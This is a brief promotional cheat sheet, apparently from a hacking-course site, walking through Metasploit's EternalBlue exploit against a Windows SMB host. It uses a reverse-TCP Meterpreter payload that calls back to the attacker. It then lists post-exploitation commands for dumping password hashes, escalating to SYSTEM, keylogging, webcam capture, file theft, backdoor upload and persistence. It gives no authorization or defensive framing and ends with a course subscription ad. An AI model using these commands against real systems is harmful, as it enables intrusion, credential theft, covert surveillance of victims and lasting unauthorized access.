Metasploit is the most used exploitation framework in the world. Every pentester, red teamer, and bug bounty hunter uses it.
msfconsole
# Step 1: Find an exploit
search type:exploit platform:windows smb
# Step 2: Load the exploit
use exploit/windows/smb/ms17_010_eternalblue
# Step 3: Configure
set RHOSTS 10.10.10.5
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST your_ip
# Step 4: Launch
exploitsysinfo # System information
getuid # Current user
getsystem # Escalate to SYSTEM
hashdump # Dump password hashes
screenshot # Capture screen
keyscan_start # Start keylogger
keyscan_dump # View captured keys
webcam_snap # Take webcam photo
shell # Drop to cmd.exe
download C:\secret.txt # Download file
upload backdoor.exe # Upload file
migrate PID # Migrate to another process
persistence # Survive rebootsSubscribe to ONLY4YOU and get hands-on access to 40+ premium courses — Ethical Hacking, Kali Linux, Metasploit, Network Hacking, Bug Bounty & more!